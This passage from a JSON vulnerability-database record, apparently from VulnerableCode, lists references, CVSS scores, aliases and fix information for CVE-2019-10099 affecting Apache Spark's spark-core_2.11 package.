                    "url": "https://lists.apache.org/thread.html/c2a39c207421797f82823a8aff488dcd332d9544038307bf69a2ba9e@%3Cuser.spark.apache.org%3E"
                },
                {
                    "reference_url": "https://lists.apache.org/thread.html/ra216b7b0dd82a2c12c2df9d6095e689eb3f3d28164e6b6587da69fae@%3Ccommits.spark.apache.org%3E",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://lists.apache.org/thread.html/ra216b7b0dd82a2c12c2df9d6095e689eb3f3d28164e6b6587da69fae@%3Ccommits.spark.apache.org%3E"
                },
                {
                    "reference_url": "https://lists.apache.org/thread.html/rabe1d47e2bf8b8f6d9f3068c8d2679731d57fa73b3a7ed1fa82406d2@%3Cissues.spark.apache.org%3E",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://lists.apache.org/thread.html/rabe1d47e2bf8b8f6d9f3068c8d2679731d57fa73b3a7ed1fa82406d2@%3Cissues.spark.apache.org%3E"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10099",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10099"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-fp5j-3fpf-mhj5",
                    "reference_id": "GHSA-fp5j-3fpf-mhj5",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-fp5j-3fpf-mhj5"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/78930?format=api",
                    "purl": "pkg:maven/org.apache.spark/spark-core_2.11@2.3.3",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1gtx-thb1-9ud6"
                        },
                        {
                            "vulnerability": "VCID-as3y-ffvw-rube"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@2.3.3"
                }
            ],
            "aliases": [
                "CVE-2019-10099",
                "GHSA-fp5j-3fpf-mhj5",
                "PYSEC-2019-114"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-vqmm-ru8x-ukcx"
        }
    ],
    "fixing_vulnerabilities": [],
    "risk_score": "10.0",
    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.11@2.0.1"
}